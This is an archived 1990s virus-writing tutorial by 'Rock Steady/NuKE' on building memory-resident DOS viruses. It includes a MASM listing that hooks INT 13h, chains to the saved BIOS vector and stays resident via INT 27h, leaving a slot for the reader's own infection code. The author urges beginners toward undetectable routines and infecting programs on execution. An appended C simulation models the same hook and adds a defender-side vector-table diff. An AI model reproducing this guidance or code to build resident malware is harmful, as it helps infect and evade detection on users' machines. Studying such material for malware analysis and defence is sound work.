textfiles/virus/rstut002.txt

***********************************
**       TSR COM infections      **
**                               **
**       By Rock Steady/NuKE     **
***********************************
There are several ways to construct your viruses. Mainly you have those
which are RAM-resident, better known as TSR (Terminate and Stay Resident)
programs, and, with great thought, those which are not RAM-resident.
A TSR virus loads itself into memory once and can then infect every program
the computer executes, like my AmiLiA virus, which infects all EXE and COM
files that are run. A TSR virus therefore spreads a lot faster than a
non-resident virus, because a non-resident virus only infects when its host
is run. The non-resident virus starts off very slowly, but once it has been
in the system for a number of weeks it will certainly have reached ALL the
files in the system, since it does not care which programs get executed.
A TSR virus, on the other hand, USUALLY infects only files that are
executed, so only the programs that are run often get infected. But the
TSR virus can certainly infect A LOT more files than a non-resident one JUST
in the first hour! It is outnumbered 10 to 1. This is the advantage that
all programmers enjoy, and why they program TSR viruses. I will explain a
SIMPLE method of making your program a TSR, one that is as flexible as you
want, so that NO ONE can say you `stole' this information off Rock Steady.
Anyhow, I will explain the simple process of intercepting BIOS and DOS
interrupts and hooking your virus/program to any interrupt of your choice.
The method explained here is also used by ALL the Jerusalem strains and by
several of the Vacsina strains; close to 100+ viruses go resident this
simple way with INT 27h. Anyhow, just because I'm explaining this method
does not mean your virus CAN be detected because of these TSR routines,
because there are routines I DEVELOPED ALONE which I will soon release in
one of my future virii. There are an UNLIMITED number of ways to make TSRs,
so as long as you develop YOUR OWN routine it will NEVER get detected as a
virus, for all you beginners. And this routine can be used in several OTHER
utilities, not just viruses.
Beginning...
~~~~~~~~~~~
First we must intercept an interrupt. Let's say we want our virus to
activate every time the disk is accessed: we would hook INT 13h or INT 21h.
INT 13h is the BIOS disk service, called for every sector read or write,
so it fires whenever any file is read, written or loaded from disk. INT 21h
is the DOS services interrupt, called whenever a program is executed, a file
is opened or closed, or any other DOS function is used, like a "DIR" in DOS.
If you want you can even hook your virus to INT 10h, so it activates when
something is written to the screen, or to INT 17h, the printer interrupt.
Whatever seems to `enlighten' you; since we live in a distressed world I
won't even bother explaining why we shouldn't hook just ANY interrupt.
Anyhow, interrupts use a vector table at the bottom of memory (in RAM, at
0000:0000, not in ROM) to find out which routine to call, whether that
routine lives in the ROM BIOS, in DOS, or in whatever TSR hooked it last.
Each entry is a 4-byte far pointer (offset word, then segment word) stored
at address (interrupt number x 4). So the vector for INT 21h is located at
0000:0084 and the vector for INT 13h at 0000:004Ch. We can change these
entries: we change the vector to POINT to our virus, so every time the
interrupt is called the CPU looks up the table and the table sends it to
our virus rather than to the ROM BIOS. But what we MUST do FIRST is save
the ORIGINAL vector somewhere in our resident code, so that our virus can
call the original routine after executing itself.
Let's say we hook our virus to INT 13h, which handles all disk activity.
When a program tries to read something from the disk, it issues INT 13h to
have the BIOS do it; instead of landing in the INT 13h routine, the call
lands in our virus, which does what it has to do and then transfers control
to the original INT 13h routine at the address we saved. Pushing the flags
before a far call to that address simulates the INT instruction, so the
original ROM BIOS routine can return with IRET exactly as it normally does.
;----------------------------------------------------------------
; Sample program on how to hook your virus to an interrupt call.
; (MASM syntax, built as a .COM file)
;----------------------------------------------------------------
Code    Segment
        Assume  cs:code,ss:code,ds:code,es:code
        Org     100h                    ; Guess this will be a COM file? Huh?
Begin:  JMP     Bios_Routine            ; 3-byte jump to the installer
        NOP                             ; This is just a cheap .COM file that the
        NOP                             ; virus is attached to. Remember the virus
        NOP                             ; must keep a copy of the host's ORIGINAL
        INT     20h                     ; first 3 bytes, which the JMP overwrites.
OLD_ROM_INT     DD      ?               ; Doubleword that saves the OLD Int address
                                        ; (offset word, then segment word)
;----------------------------------------------------------------
; This calls the VIRUS and then simulates the OLD ROM routine
;----------------------------------------------------------------
Virus_Codes PROC FAR
        Assume  cs:code, ds:nothing     ; DS belongs to the caller, not to us:
                                        ; our own data is addressed through CS
        pushf                           ; Every time the ROM routine is called this
        push    ax                      ; is what happens... Save the registers,
        push    bx                      ; run our virus, restore the registers and
        push    cx                      ; run the OLD ROM BIOS routine that was
        push    dx                      ; supposed to run in the first place...
        push    si
        push    di
        push    es
        push    ds
        call    The_Virus
        pop     ds                      ; NOTE: save ALL registers and the flags,
        pop     es                      ; because our virus WILL alter a few, and
        pop     di                      ; when it hands control back the caller
        pop     si                      ; EXPECTS to continue where it left off...
        pop     dx
        pop     cx
        pop     bx
        pop     ax
        popf
        pushf                           ; This `pushf' is NEEDED to simulate the INT
        call    dword ptr cs:OLD_ROM_INT ; instruction: the old handler takes this as
                                        ; an INT and returns here with its result
                                        ; flags (for INT 13h, CF = error) still live
        ret     2                       ; Far return that also discards the flags word
                                        ; pushed by the caller's INT, so the BIOS's
                                        ; carry flag reaches the caller. A plain `ret'
                                        ; would leave the stack 2 bytes off every call.
Virus_Codes ENDP
;----------------------------------------------------------------
; Put the REAL virus codes here...
;----------------------------------------------------------------
The_Virus PROC NEAR
        ...                             ; Put your OWN virus codes here...
        ...                             ; Just make it compatible with our
        ...                             ; codes... Try to make it small so
        ...                             ; it takes up less space in the
        ...                             ; user's memory.
        ...
        ...                             ; NOTE: Try to infect files ONLY when they
        ...                             ; are executed, rather than each time the
        ...                             ; INT is used... Get it?
        RET
The_Virus ENDP
;---------------------------------------------------------------
; This is the procedure that SAVES the OLD ROM BIOS vector in our
; virus and points the vector at our virus, which then calls the
; OLD ROM BIOS routine. So remember to SAVE it first.
;---------------------------------------------------------------
Bios_Routine PROC NEAR
        Assume  cs:code,ds:code         ; In a .COM file DS = CS = the PSP segment
        mov     ah,35h                  ; DOS: get interrupt vector. Whatever is
        mov     al,13h                  ; in AL is the INT number whose vector
        int     21h                     ; you get; it comes back in ES:BX
        mov     word ptr OLD_ROM_INT,bx     ; Save the offset in our doubleword
        mov     word ptr OLD_ROM_INT[2],es  ; and the segment right after it
; Here you SHOULD put a small routine to check whether the vector has
; already been changed! The vector for INT n lives at 0000:(n*4): for
; INT 13h that is 0000:004Ch, and for INT 21h it is (21h x 4) = 0084h.
; The simplest test compares ES:BX with the ROM BIOS address: if the
; vector no longer points into the ROM, assume the virus changed it and
; is already resident. This is a simple way of doing it, but not always
; the BEST way, because any other program that hooks the interrupt will
; fool the virus into thinking it is already resident. Comparing the
; first bytes at ES:BX with our own Virus_Codes is more reliable.
; Though this source is NOT for the professional virus programmer like
; myself, because WE KNOW! But for those that are half way there...
        mov     ah,25h                  ; DOS: set interrupt vector
        mov     al,13h                  ; INT number to be set goes in AL
        mov     dx,offset Virus_Codes   ; DS:DX = new handler; sets INT 13h
        int     21h                     ; to point to `Virus_Codes'
        mov     dx,offset Bios_Routine  ; DX = bytes to keep, counted from the PSP
        int     27h                     ; Terminate and stay resident
Bios_Routine ENDP
; Anything after this point will not be memory resident, because the
; resident portion ends where the `Bios_Routine' procedure starts.
Code    ENDS
        END     Begin
;----------------------------- EnD ----------------------------------
Simple, isn't it? Anyhow, I tried to make this as simple as possible; I
hope I didn't lose you. This is a simple routine that several TSR virii
use. Anyhow, see what that gives you....
Rock Steady
NuKE / Viral Development Researcher
-PeAcE-
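The vector-table arithmetic, the hook-and-chain and the residency check from the
text above, together with the defender's side of the same table (diffing the live
vectors against a boot-time snapshot, which is how early DOS integrity checkers
caught a redirected INT 13h), as an added C simulation. This is not Rock Steady's
code and carries no infection logic: a C program on a modern OS cannot touch
0000:0000, so the IVT is a byte array, "code" is a registry of segment:offset to
C function, the payload is reduced to a counter, and the PSP segment 1234h and the
ROM address F000:EC59 (the classic IBM PC INT 13h entry) are assumptions.

```c
/* Simulated real-mode interrupt vector table (IVT) and hook-and-chain, added as an
 * illustration; not Rock Steady's code and not any real virus. A C program on a modern
 * OS cannot touch 0000:0000, so the IVT is a byte array and "code" is a registry of
 * segment:offset -> C function. The segment values below are assumptions. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef struct { uint16_t off, seg; } farptr;   /* IVT entry: offset word, then segment word */
typedef struct { uint16_t ax; int carry; } cpu;  /* the only register state the demo models */
typedef void (*handler_fn)(cpu *);

static uint8_t low_mem[256 * 4];                 /* 0000:0000..0000:03FF, the IVT */
static uint32_t linear(farptr p) { return ((uint32_t)p.seg << 4) + p.off; }

/* The slot for INT n is at 0000:(n*4): 4Ch for INT 13h, 84h for INT 21h. */
uint16_t ivt_slot(uint8_t n) { return (uint16_t)n * 4; }
farptr ivt_get(uint8_t n) { farptr p; memcpy(&p, low_mem + ivt_slot(n), sizeof p); return p; }
static void ivt_set(uint8_t n, farptr p) { memcpy(low_mem + ivt_slot(n), &p, sizeof p); }
void ivt_snapshot(uint8_t *dst) { memcpy(dst, low_mem, sizeof low_mem); }

/* Registry standing in for executable memory at far addresses. */
static struct { farptr at; handler_fn fn; } code_sites[8];
static int n_sites;
static void place_code(farptr at, handler_fn fn) { code_sites[n_sites].at = at; code_sites[n_sites].fn = fn; n_sites++; }
/* "pushf / call dword ptr [target]": run whatever code sits at a far address. */
static void call_far(farptr target, cpu *c) {
    for (int i = 0; i < n_sites; i++)
        if (linear(code_sites[i].at) == linear(target)) { code_sites[i].fn(c); return; }
    c->carry = 1;                                /* vector points at nothing: report failure */
}
/* The INT instruction: fetch the vector from the table and call it. */
void do_int(uint8_t n, cpu *c) { call_far(ivt_get(n), c); }

/* ROM BIOS disk service at F000:EC59 (assumed ROM address). AH=02h (read) succeeds with
 * AL = sectors read; any other function returns with the carry flag set, as on error. */
static const farptr ROM_INT13 = { 0xEC59, 0xF000 };
int disk_calls;
static void rom_int13(cpu *c) {
    disk_calls++;
    if ((c->ax >> 8) == 0x02) { c->carry = 0; c->ax &= 0x00FF; } else c->carry = 1;
}

/* The resident virus: assumed PSP segment 1234h, Virus_Codes at offset 109h as in the
 * listing. OLD_ROM_INT is the doubleword the resident code keeps; the payload is a counter. */
static const farptr VIRUS_CODES = { 0x0109, 0x1234 };
static farptr OLD_ROM_INT;
int payload_runs;
static void virus_codes(cpu *c) {
    cpu saved = *c;                              /* pushf / push ax ... */
    payload_runs++;                              /* call The_Virus */
    *c = saved;                                  /* pop ax / popf */
    call_far(OLD_ROM_INT, c);                    /* pushf / call OLD_ROM_INT; retf 2 passes CF on */
}

/* Residency check: does the INT 13h slot already point at our handler? */
int already_resident(void) { return linear(ivt_get(0x13)) == linear(VIRUS_CODES); }

/* Bios_Routine: AH=35h reads the old vector, AH=25h installs ours; INT 27h would then
 * keep everything up to Bios_Routine in memory. Returns 1 if installed, 0 if resident. */
int install_hook(void) {
    if (already_resident()) return 0;
    OLD_ROM_INT = ivt_get(0x13);
    place_code(VIRUS_CODES, virus_codes);
    ivt_set(0x13, VIRUS_CODES);
    return 1;
}

/* Defender side: diff the live IVT against a known-good snapshot. Returns how many
 * vectors changed and writes up to `max` of their INT numbers into `changed`. */
int ivt_changed_vectors(const uint8_t *snapshot, uint8_t *changed, int max) {
    int n = 0;
    for (int v = 0; v < 256; v++)
        if (memcmp(snapshot + v * 4, low_mem + v * 4, 4) != 0) { if (n < max) changed[n] = (uint8_t)v; n++; }
    return n;
}

/* Cold boot: empty table, only the ROM handler installed for INT 13h. */
void boot(void) {
    memset(low_mem, 0, sizeof low_mem); n_sites = 0; disk_calls = 0; payload_runs = 0;
    place_code(ROM_INT13, rom_int13);
    ivt_set(0x13, ROM_INT13);
}

int main(void) {
    uint8_t snap[256 * 4], changed[256];
    cpu c = { 0x0201, 0 };                       /* AH=02h read, AL=1 sector */
    boot();
    ivt_snapshot(snap);                          /* baseline taken before any TSR loads */
    install_hook(); install_hook();              /* a second copy sees the vector already pointing at us */
    do_int(0x13, &c);                            /* through the hook, then the ROM */
    printf("read: CF=%d AL=%u payload=%d disk=%d\n", c.carry, (unsigned)(c.ax & 0xFF), payload_runs, disk_calls);
    c.ax = 0xFF00; do_int(0x13, &c);
    printf("bad function: CF=%d (the BIOS error reaches the caller through the hook)\n", c.carry);
    int n = ivt_changed_vectors(snap, changed, 256);
    printf("vectors changed since boot: %d, first INT %02Xh\n", n, changed[0]);
    return 0;
}
```

The carry-flag path is the reason the listing chains with pushf/call and a far
return that drops two bytes: INT 13h reports errors in CF, and a hook that
returned with IRET would hand the caller its own pre-call flags instead. The
snapshot diff is deliberately dumb; it also flags legitimate TSRs that hook
vectors, so a real checker compares against a baseline taken after the normal
resident software is loaded.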